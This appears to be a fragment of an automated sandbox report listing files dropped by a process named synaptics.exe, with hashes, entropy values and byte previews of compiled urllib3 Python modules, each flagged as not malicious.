                                                                                                                                                                                                                Preview:o........!.f[........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e...d...d...Z.e.j.e.j.e.j.e.e.f...e.f.....Z.e.j.e.e.j.e.e.f...f...Z.d.d.d...Z.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...BytesIO.....)..._TYPE_FIELD_VALUE_TUPLE..RequestFieldz.utf-8.......return..strc....................C...s....t...t...d.........S.).zN. Our embarrassingly-simple replacement for mimetools.choose_boundary.. .....)...binascii..hexlify..os..urandom..decode..r....r.....?C:\Users\user\Desktop\tmp\lib\site-packages\urllib3\filepost.py..choose_boundary....s......r......fields.._TYPE_FIELDS..typing.Iterable[RequestField]c....................c...sH.....t.|.t.j...r.|.....}.n.|.}.|.D.].}.t.|.t...r.|.V...q.t.j.|...V...q.d.S.).z.. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... N)...isinstance..typing..Mapping..itemsr....Z.from_tuples).r......iterable..fieldr....r..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):18187
                                                                                                                                                                                                                Entropy (8bit):5.489163460827947
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ulCIl5+QTvw7bm2+Pp0hTZp4tGwimHF3Y:uvgQTvwng+NZp8Bl3Y
                                                                                                                                                                                                                MD5:7BEB2F54A108F776326F5E8F00C1BF21
                                                                                                                                                                                                                SHA1:C40C3DEA875418DE40A725CFDB5A12CD31A84A46
                                                                                                                                                                                                                SHA-256:80BABCC4D9F159C1591E9F0D878CA6D968B6877CE9848001D964A216E74C0DCC
                                                                                                                                                                                                                SHA-512:57304B50EE1FD4DED7F3EFCCF3F297C690B3E05756F343CAC497C94E5AF84653CD8A5430857DBD8AF1AAE0DFC3E0D25B2CC8E061748EA097208ABCDDB5E9553A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.Y.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..e.j'r.d.d.l(Z(d.d.l)m*Z*..g.d...Z+e..,e-..Z.d.Z/d.Z0G.d.d...d.e.j1..Z2d)d.d...Z3e..4e3e2..e..4e3e2..d...Z5e.e.d...Z6G.d.d ..d e...Z7G.d!d"..d"e7..Z8d*d'd(..Z9d.S.)+.....)...annotationsN)...TracebackType)...urljoin.....)...HTTPHeaderDict..RecentlyUsedContainer)...RequestMethods)...ProxyConfig)...HTTPConnectionPool..HTTPSConnectionPool..port_by_scheme)...LocationValueError..MaxRetryError..ProxySchemeUnknown..URLSchemeUnknown)...BaseHTTPResponse)..._TYPE_SOCKET_OPTIONS)...connection_requires_http_tunnel)...Retry)...Timeout)...Url..parse_url)...Self)...PoolManager..ProxyManager..proxy_from_url)...key_file..cert_file..cert_reqs..ca_certs..ca_cert_data..ssl_version..ssl_minimum_version..ssl_maximum_version..ca_cert_dir..ss
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):33449
                                                                                                                                                                                                                Entropy (8bit):5.333366958332206
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:uPBkshRIwAG560Mg+c3lKBgtd1xaZ38CSYJr/YV4CypM0AmwK2Kd1B+E1dz6RPrX:NGc8L1KBaPxbupCIAHK2KZiy8wUhX
                                                                                                                                                                                                                MD5:A99EE77998387DB38AD133890BE81DF5
                                                                                                                                                                                                                SHA1:5EF31F02C445BD8728D094167F82CD05EFDFA8C3
                                                                                                                                                                                                                SHA-256:316CC4F752228E2655F5D9A746D6AEB4223842ACA6DDA76C0B55BE01B8083ABB
                                                                                                                                                                                                                SHA-512:8A4E1BC27E0AFB6990B9DDCFD80FD71FDC3BC7E1E2B1F3EF6C0A122CE5A5C95EA3AD96DC06FB318AD9F1EFD2E3E7DFF7DFCC7347741F592475C9193EB66D1FE3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.rKd.d.l.m.Z...z.z.d.d.l.Z.W.n...e.y_......d.d.l.Z.Y.n.w.W.n...e.yl......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.e.e.f.y.......d.Z Y.n.w.e!e"e#e..$d.e.j%...&......Z'e'd.k.r.d.Z n.d.Z d.d.l(m)Z)..d.d.l.m*Z*..d.d.l+m,Z,..d.d.l-m.Z.m/Z/m0Z0..d.d.l1m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>..d.d.l?m@Z@..e.j.r.d.d.lAmBZB..e..CeD..ZEG.d.d...d...ZFG.d.d...d.eF..ZGG.d.d...d...ZHG.d.d...d.eF..ZIe.d.u...r.G.d.d...d.eF..ZJe ..r.G.d.d ..d eF..ZKG.d!d"..d"eF..ZLd.d&d'..ZMG.d(d)..d)..ZNG.d*d+..d+e.jO..ZPG.d,d-..d-eP..Z.d.S.)/.....)...annotationsN)...contextmanager)...HTTPMessage)...HTTPResponse)...timeout.....)...BaseHTTPConnectionFz.^([0-9]+)\.([0-9]+)).r.........T)...util)..._TYPE_BODY)...HTTPHeaderDict)...BaseSSLError..HTTPConnection..HTTPException)...BodyNotHttplibCompatible..DecodeError..HTTPError..IncompleteRead..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):164
                                                                                                                                                                                                                Entropy (8bit):4.416281924108459
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:y/jr5/Ulluleh/wZWeiouWDT6MWRIFMHdVWrzOXH+IOkcTgp:y/h/U/qeh/wxZDGuFM9Ar6XeR4
                                                                                                                                                                                                                MD5:7E3D2ACEC6F620862E29473F57D4391F
                                                                                                                                                                                                                SHA1:BB19F3A944E0C24023CA3E88455FC10EA64C1625
                                                                                                                                                                                                                SHA-256:60B96CD4CDA2E831C2E62B3F80D2BB7569F863A1295A5A03874F248B13D9B43F
                                                                                                                                                                                                                SHA-512:B3415D52F2260EFF646BEA6734723F732DA0BF509C409301CDEA03DC25F86EBCFB3A21C2D8AD5C00AEE14BDFD32C864A5658F568F2102C06F99DB2FE5DA73FA4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.S.).N..r....r....r.....GC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\contrib\__init__.py..<module>....s......
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6125
                                                                                                                                                                                                                Entropy (8bit):5.629837834761319
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:bq8bFojUEqiHSz8iKWZMs7hTbWiTmC69iE245Zi81JQ3:26VEqtQGbC9ipca3
                                                                                                                                                                                                                MD5:79E9DBEEC079F81EDB020276DB22F339
                                                                                                                                                                                                                SHA1:1454BCC658ABBB8C7F813FCC24BB7313BE4322C0
                                                                                                                                                                                                                SHA-256:93E27273B1186A444A2D5DBD88E5C1F2787A5B8FB4F2D1FB019A24E01CF47FE4
                                                                                                                                                                                                                SHA-512:617ADDDA62F97A2F1EBBA0E51CCCC3FF9FDF5DBC3496553F78B77EF646849308424472F532E1F2B87609F405AB018C3A79C3C686144B16B492F6164E166C679C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f}........................@...s6...d.Z.d.d.l.m.Z...z.d.d.l.Z.W.n...e.y&......d.d.l.Z.d.d.l.m.Z...e...d.e.......w.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.yf......d.Z.Y.n.w.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z d.S.).a.....This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recom
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1401
                                                                                                                                                                                                                Entropy (8bit):5.3767784610005345
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:rMu6QKYYYH7N9QU4DMU3KZsGfM3yRiR7FzGW92vbwFWHrb49msQWP7:gBdYLbX4DinRayD9Hrb4mAP7
                                                                                                                                                                                                                MD5:28159DC1C1799E993309D3524C34E75C
                                                                                                                                                                                                                SHA1:36F78187DFBBF2F0C240E97A6B577ABECDB465FD
                                                                                                                                                                                                                SHA-256:974900C1AEA92BBA102142F93D24793362F5E2F686C7A455EFB7A7A8A43BB174
                                                                                                                                                                                                                SHA-512:DA73C5B1CCB7D8F4C5FAE7CB6A376404F533885DFDCE418ACFE6479C256889C5CDF754A6F7C706AAF63BC14DD4E7DA998D4BD4DD9D8F2311487099AEFF05240B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sN...U.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.l.Z.d.a.d.e.d.<.d.d.d...Z.d.d.d...Z.d.S.)......)...annotations)...version..inject_into_urllib3..extract_from_urllib3Nz.typing.Any..orig_HTTPSConnection..return..Nonec....................C...s....t.d...}.|...d...s.t.d.|...d.......d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...|.j.a.|.|._.|.|._.d.g.|._.d.g.|._.d.S.).N..h2z.4.zQurllib3 v2 supports h2 version 4.x.x, currently the 'h2' module is compiled with z5. See: https://github.com/urllib3/urllib3/issues/3290.........connection....util....HTTPSConnectionPool....ssl_.....)...HTTP2Connection).r......startswith..ImportError..r....r......connectionpoolr....r....r......HTTPSConnectionr......ConnectionCls..ALPN_PROTOCOLS).Z.h2_version..urllib3_connection..urllib3_utilr......urllib3_util_sslr......r.....EC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\http2\__init__.pyr........s".....................................c....................C...sP.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                                                                Entropy (8bit):5.244052915134119
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:KBPQG3rPHqRTB08DGmDZrZCYawGQ2bcwf27jpWsI663cv6iuJh6+:KBzG/DGmDZEYaw4bbujpXkSNok+
                                                                                                                                                                                                                MD5:4752D728C72D7AC4CA23EA00006DC855
                                                                                                                                                                                                                SHA1:CCBC5A38347F7E5FD56C731248D0C63E7BC6A8E7
                                                                                                                                                                                                                SHA-256:CB22EE7CF87826786FC32AD134E008D953D4F54CDF743BB0CBD39C77B8052627
                                                                                                                                                                                                                SHA-512:E00E08948661055F0F3658CF5344E98CE48F3AFB10DDB301C968B13DFC5800C91073CCACC1F70CB3817F9664E8FB7AFF8FD00E0257A0ACBDB11689906C34A908
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sL...d.d.l.m.Z...d.d.l.Z.G.d.d...d...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.g.Z.d.S.)......)...annotationsNc....................@...sB...e.Z.d.Z.d.Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)..._HTTP2ProbeCache...._lock.._cache_locks.._cache_values..return..Nonec....................C...s....t.....|._.i.|._.i.|._.d.S...N)...threading..Lockr....r....r........self..r.....BC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\http2\probe.py..__init__....s..........z._HTTP2ProbeCache.__init__..host..str..port..int..bool | Nonec....................C...s....d.}.|.j..7..|.|.f.}.z.|.j.|...}.|.d.u.r.|.W.W...d.........S.W.n...t.y4......t.....|.j.|.<.d.|.j.|.<.Y.n.w.W.d.........n.1.s?w.......Y...|.j.|...}.|.......z.|.j.|...}.W.|.S...t.ym..}...z.t.|.t...rdJ...|.........d.}.~.w.w.r....).r....r......KeyErrorr......RLockr......acquire..BaseException..isinstance..release).r....r....r......value..key..key_lock..er....r....r......acquire_and_get....s4.....
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):944
                                                                                                                                                                                                                Entropy (8bit):5.298813273907028
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:nJUVegJzYoyYhRYQZyihmLptrv2buqq9PXDGL:n3gJz2Y39Zyi0TrOaqq9Pc
                                                                                                                                                                                                                MD5:6218DD074BC37E3A4AD6B35C95310DC8
                                                                                                                                                                                                                SHA1:4587640CCEC18FFB6BF3141DC19EF16AB9FC979F
                                                                                                                                                                                                                SHA-256:5EAAB18E35FDC9DAEE691CE931EAC1A4F5B6BC6F971703905CF6F26CA5BEAC05
                                                                                                                                                                                                                SHA-512:1B62D4BAC22E9AF447AA3F7F619C1322485293324FB5C6DAA9BDF2BC6DA922452CABFF57B8375DAA49F1FBDD6A2327C252C703C0796ADE4694CE7CDF6B5C433D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.S.)......)...annotations.....)...is_connection_dropped)...SKIP_HEADER..SKIPPABLE_HEADERS..make_headers)...is_fp_closed)...Retry)...ALPN_PROTOCOLS..IS_PYOPENSSL..SSLContext..assert_fingerprint..create_urllib3_context..resolve_cert_reqs..resolve_ssl_version..ssl_wrap_socket)...Timeout)...Url..parse_url)...wait_for_read..wait_for_write).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...__future__r......connectionr......requestr....r....r......responser....Z.retryr....Z.ssl_r....r....r....r....r....r....r....r......timeoutr......urlr....r......waitr....r......__all__..r....r.....DC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\__init__.py..<module>....s..............(.........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3463
                                                                                                                                                                                                                Entropy (8bit):5.537640901737742
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:Zd8QkXnG1+RA+j7JArpwwSRGR7UAm0DEWStUV5yrIeoYPqr+rb8WTUVHwZJP9+:HkX0+m+hAVwwStdndm5YXiub8WT3ZJI
                                                                                                                                                                                                                MD5:162B1F44D240F2F57ED98102F96A740B
                                                                                                                                                                                                                SHA1:407BBF2C0893D6C60AD5DFEC2F9F68144E93DDFE
                                                                                                                                                                                                                SHA-256:F0345999CE1DB3B256F3AEF30C7C4E2CD9A70808BFF5801BD500326CEFC77400
                                                                                                                                                                                                                SHA-512:53B5C28076A62130A60DD0DFDF7F02B895DDEEDE849E1AFB221FE082688043D12AE1E3A6019F50B775E79BFC27AEBEAEA7DF58A34DC21D772F8D04BBA49A0829
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fj........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.j.e.e.e.j.e.e.f...f.....Z.e.j.r5d.d.l.m.Z...d&d.d...Z.e.d.d.f.d'd.d...Z.d(d.d...Z.d)d.d ..Z.d*d#d$..Z.e.d%..Z.d.S.)+.....)...annotationsN.....)...LocationParseError.....)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...BaseHTTPConnection..connr......return..boolc....................C...s....|.j...S.).z.. Returns True if the connection is dropped and should be closed.. :param conn: :class:`urllib3.connection.HTTPConnection` object.. )...is_connected).r......r.....FC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\connection.py..is_connection_dropped....s......r......address..tuple[str, int]..timeoutr......source_address..tuple[str, int] | None..socket_options.._TYPE_SOCKET_OPTIONS | None..socket.socketc....................C...s$...|.\.}.}.|...d...r.|...d...}.d.}.t...}.z.|...d.....W.n...t.y*......t.d.|...d.....d...w.t...|.|.|.t.j...D.]O}.|.\.}.}.}.}.}.d.}.z(t...|.|.|...}.t.|.|
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                Entropy (8bit):5.366043155096196
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:U6/ZpGf5n/lIpWt84RzmQXvAFnT8adLRU0G7frY8lt6rn:1ut/Rt82m38apK5f7S
                                                                                                                                                                                                                MD5:F923449B2856B4525E490A14343880B6
                                                                                                                                                                                                                SHA1:FE44578AC3748235735476B1F00E57DE8BFC11D1
                                                                                                                                                                                                                SHA-256:457BFE0FD0AEBFFE87357CBABD4991B0D5BA3BE2B67B9B428C00A2D57723DCF5
                                                                                                                                                                                                                SHA-512:8D7113CC2C56EFB1ED36EFBD0D4B976FDFE2C2BACC19B92C77DF506046E719AB969BC5EA97737188D363BE62ECF3B4B1A48EBEDA758AE1258695EF4FA5AACAA8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f|........................@...sH...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...e.j.r.d.d.l.m.Z.........d.d.d.d...Z.d.S.)......)...annotationsN.....)...Url.....)...ProxyConfig..proxy_url..Url | None..proxy_config..ProxyConfig | None..destination_scheme..str | None..return..boolc....................C...s4...|.d.u.r.d.S.|.d.k.r.d.S.|.j.d.k.r.|.r.|.j.r.d.S.d.S.).a?.... Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). NF..http..httpsT)...scheme..use_forwarding_for_https).r....r....r......r.....AC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\proxy.py..connection_requires_http_tunnel....s..........................r....).NNN).r....r....r....r....r....r....r....r....)...__future__r......typing..urlr......TYPE_CHECKING..con
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6198
                                                                                                                                                                                                                Entropy (8bit):5.647243775289676
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:xj+t5WiDKV+DKYzQ2P7f5xv5j4GyT/+MyjjMbsrHMCtkXT3v5tChK:kXKV+DKYzP7xx6tsjM4HITDN
                                                                                                                                                                                                                MD5:382A9CD15AB81DCFBD774A8B78C5C5D8
                                                                                                                                                                                                                SHA1:B24EF4047528B60A244966CC74B1E222CE47ED04
                                                                                                                                                                                                                SHA-256:51ED94131CA47AA3C58893141788C65D541E224E5FB32757CA4AB4CF1FDFCD1F
                                                                                                                                                                                                                SHA-512:74C2D6308D64732CB9E8DEBFFEB2875B04A7AC49D6BFCC60375F3D7F4A905EDE3DEBE29F9D500F67FC9219D7AAB97F8124A0AD3691711293DAC12E4FED67F9C4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sd...U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r0d.d.l.m.Z...d.Z.e.g.d.....Z.d.Z.z.z.d.d.l.Z.W.n...e.yN......d.d.l.Z.Y.n.w.W.n...e.yY......Y.n.w.e.d.7.Z.z.d.d.l.Z.W.n...e.ym......Y.n.w.e.d.7.Z.G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.e.f...Z.h.d...Z.............d6d7d.d ..Z d8d%d&..Z!d9d+d,..Z"G.d-d...d.e.j#..Z$d:d4d5..Z%d.S.);.....)...annotationsN)...b64encode)...Enum.....)...UnrewindableBodyError.....)...to_bytes)...Finalz.@@@SKIP_HEADER@@@)...accept-encoding..host..user-agentz.gzip,deflatez.,brz.,zstdc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_FAILEDTELLr....N)...__name__..__module__..__qualname__..token..r....r.....CC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\request.pyr....'...s........r....z.Final[_TYPE_FAILEDTELL].._FAILEDTELL>....Z.DELETE..HEADZ.OPTIONSZ.TRACEZ.GETZ.CONNECT..keep_alive..bool | None..accept_encoding..bool | list[str] | str | None..user_agent..str | None..basic_aut
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2330
                                                                                                                                                                                                                Entropy (8bit):5.360914038588091
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:imhh166JQ+Nk7gkL2YMHhfpm7kmpx6nriZEviRo3C:J66GslvhaIds
                                                                                                                                                                                                                MD5:CC27A57BE56A591CD903D09F892BF5EB
                                                                                                                                                                                                                SHA1:C827301099BEB3DEE996ABE3213572E8C239BC09
                                                                                                                                                                                                                SHA-256:973B65A50D9E0F32605DCC4A0812F6F41798D3D558A328DE50F8C3DD1CB0F2D2
                                                                                                                                                                                                                SHA-512:3409C5AED2A354B0C8050DF2E377D4C942560B426FA530F23FE40615159D984142A88CBD41B63710213D6E8ECA3279A297633D6285810C9A665886B267189C23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sV...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......)...annotationsN)..!MultipartInvariantViolationDefect..StartBoundaryNotFoundDefect.....)...HeaderParsingError..obj..object..return..boolc....................C...s`...z.|.....W.S...t.y.......Y.n.w.z.|.j.W.S...t.y.......Y.n.w.z.|.j.d.u.W.S...t.y/......Y.t.d.....w.).zt. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. Nz)Unable to determine whether fp is closed.)...isclosed..AttributeError..closed..fp..ValueError).r......r.....DC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\response.py..is_fp_closed....s ...................................r......headers..httplib.HTTPMessage..Nonec....................C...sn...t.|.t.j...s.t.d.t.|.....d.......d.}.|.....s#|.....}.t.|.t.t.f...r#|.}.d.d...|.j.D...}.|.s/|.r5t.|.|.d.....d.S.).a>.... Asserts whether all headers have been successfully
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15743
                                                                                                                                                                                                                Entropy (8bit):5.359642978489926
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:Uf/rj12FuuccXjtRLJIkyuhvCTe247+TiEj0bPkCeb31I2s5P7SXR:UssuPVJvCTe7AiGiPkCeRmPmXR
                                                                                                                                                                                                                MD5:09CE0C499A2F53CB23B1C63C079EC7B5
                                                                                                                                                                                                                SHA1:161F57F81051ECCB2C51AE056412E5B1534FDC86
                                                                                                                                                                                                                SHA-256:7985B0B6352AFA6DFA1CF16DFF7BBFCD53F483842BE18C01AE9EC7F8A127919F
                                                                                                                                                                                                                SHA-512:7AB91D03A9B3F6E296CEFD8454C9BF9DB9DD21F366F3539E6F5ACA908864A0BC4740253DB00C63D8830D29CCD35F2D10086A45B7150BF8B078346083C3BD5B54
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.H.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.j.rWd.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...e...Z.G.d.d...d.e.j ..Z!G.d.d...d...Z"e"d...e"_#d.S.)......)...annotationsN)...takewhile)...TracebackType.....)...ConnectTimeoutError..InvalidHeader..MaxRetryError..ProtocolError..ProxyError..ReadTimeoutError..ResponseError.....)...reraise)...Self)...ConnectionPool)...BaseHTTPResponsec....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...RequestHistory..str | None..method..url..Exception | None..error..int | None..status..redirect_locationN)...__name__..__module__..__qualname__..__annotations__..r....r.....AC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\retry.pyr....!...s................r....c....................@...s"...e.Z.d.Z.U.d.Z.e.g.d.....Z.e.g.d.....Z.e.g.d.....Z.d.Z.d.e.d.<.d.d.d.d.d.d.e.d.d.e.d.d.d.d.e.d.f.dbd'd(..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):12455
                                                                                                                                                                                                                Entropy (8bit):5.651798450911448
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:JjkLm6642sli6M00PVnGAKK1JK9CpdJyKm2ggAgbO7:hu/luBtn/DyKMgAgbO7
                                                                                                                                                                                                                MD5:EE0C236A8CF576EAC38BEBEA71319991
                                                                                                                                                                                                                SHA1:14CB6942D1C12C17CB39409FD7934D4649DB2072
                                                                                                                                                                                                                SHA-256:068628DC03936B11A8EF0C942B89166B5511766926B3E802AF05023AC86F9924
                                                                                                                                                                                                                SHA-512:AE5E0DF3E41DF7FF828EF7F10B8A144465544092955D2496451484A73042D9390EAAB47E508169C9D2C290E056C44FD16886AFDC78010067F48A7E8D592CAF54
                                                                                                                                                                                                                Malicious:false
